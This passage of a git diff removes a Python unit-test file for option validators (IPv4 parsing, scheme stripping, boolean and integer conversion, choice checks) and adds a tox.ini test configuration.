self.assertEqual(validators.ipv4(address), address) - - def test_ipv4_invalid_address_1(self): - """ IP address with segment out of range. """ - address = "127.256.0.1" - with self.assertRaises(OptionValidationError): - validators.ipv4(address) - - def test_ipv4_invalid_address_2(self): - """ IP address with 4 digit segment. """ - address = "127.0.0.1234" - with self.assertRaises(OptionValidationError): - validators.ipv4(address) - - def test_ipv4_invalid_address_3(self): - """ IP address with extra segment """ - address = "127.0.0.123.123" - with self.assertRaises(OptionValidationError): - validators.ipv4(address) - - @mock.patch("socket.inet_pton") - def test_ipv4_no_inet_pton_valid_address(self, mock_inet_pton): - address = "127.0.0.1" - mock_inet_pton.side_effect = AttributeError - self.assertEqual(validators.ipv4(address), "127.0.0.1") - - @mock.patch("socket.inet_pton") - def test_ipv4_no_inet_pton_invalid_address_1(self, mock_inet_pton): - """ IP address with segment out of range. """ - address = "127.256.0.1" - mock_inet_pton.side_effect = AttributeError - with self.assertRaises(OptionValidationError): - validators.ipv4(address) - - @mock.patch("socket.inet_pton") - def test_ipv4_no_inet_pton_invalid_address_2(self, mock_inet_pton): - """ IP address with 4 digit segment. """ - address = "127.0.0.1234" - mock_inet_pton.side_effect = AttributeError - with self.assertRaises(OptionValidationError): - validators.ipv4(address) - - @mock.patch("socket.inet_pton") - def test_ipv4_no_inet_pton_invalid_address_3(self, mock_inet_pton): - """ IP address with extra segment """ - address = "127.0.0.123.123" - mock_inet_pton.side_effect = AttributeError - with self.assertRaises(OptionValidationError): - validators.ipv4(address) - - def test_address_strip_scheme_1(self): - address = "http://127.0.0.1" - self.assertEqual(validators.address(address), "127.0.0.1") - - def test_address_strip_scheme_2(self): - address = "ftp://127.0.0.1" - self.assertEqual(validators.address(address), "127.0.0.1") - - def test_boolify_false_1(self): - value = False - self.assertEqual(validators.boolify(value), False) - - def test_boolify_false_2(self): - value = "No" - self.assertEqual(validators.boolify(value), False) - - def test_boolify_false_3(self): - value = "n" - self.assertEqual(validators.boolify(value), False) - - def test_boolify_false_4(self): - value = "OFF" - self.assertEqual(validators.boolify(value), False) - - def test_boolify_false_5(self): - value = "0" - self.assertEqual(validators.boolify(value), False) - - def test_boolify_false_6(self): - value = "False" - self.assertEqual(validators.boolify(value), False) - - def test_boolify_false_7(self): - value = "f" - self.assertEqual(validators.boolify(value), False) - - def test_boolify_true_1(self): - value = True - self.assertEqual(validators.boolify(value), True) - - def test_boolify_true_2(self): - value = "Yes" - self.assertEqual(validators.boolify(value), True) - - def test_boolify_true_3(self): - value = "y" - self.assertEqual(validators.boolify(value), True) - - def test_boolify_true_4(self): - value = "oN" - self.assertEqual(validators.boolify(value), True) - - def test_boolify_true_5(self): - value = "1" - self.assertEqual(validators.boolify(value), True) - - def test_boolify_true_6(self): - value = "tRuE" - self.assertEqual(validators.boolify(value), True) - - def test_boolify_true_7(self): - value = "t" - self.assertEqual(validators.boolify(value), True) - - def test_choice_1(self): - valid_values = ["test1", "test2"] - selected_value = "test1" - self.assertEqual(validators.choice(valid_values)(selected_value), - selected_value) - - def test_choice_2(self): - valid_values = ["test1", "test2"] - selected_value = "t" - - with self.assertRaises(OptionValidationError): - validators.choice(valid_values)(selected_value) - - def test_choice_3(self): - valid_values = ["test1", "test2"] - selected_value = "Test1" - - with self.assertRaises(OptionValidationError): - validators.choice(valid_values)(selected_value) - - def test_integer_1(self): - self.assertEqual(validators.integer('1'), 1) - - def test_integer_2(self): - self.assertEqual(validators.integer('123'), 123) - - def test_integer_3(self): - with self.assertRaises(OptionValidationError): - validators.integer('foobar') - - -if __name__ == '__main__': - unittest.main() diff --git a/tox.ini b/tox.ini new file mode 100644 index 000000000..eeafb0890 --- /dev/null +++ b/tox.ini @@ -0,0 +1,11 @@ +[tox] +skipsdist = True +envlist = py27,py34,py35,py36 + +[testenv] +deps = + mock + pexpect + -r{toxinidir}/requirements.txt + +commands=python -m unittest discover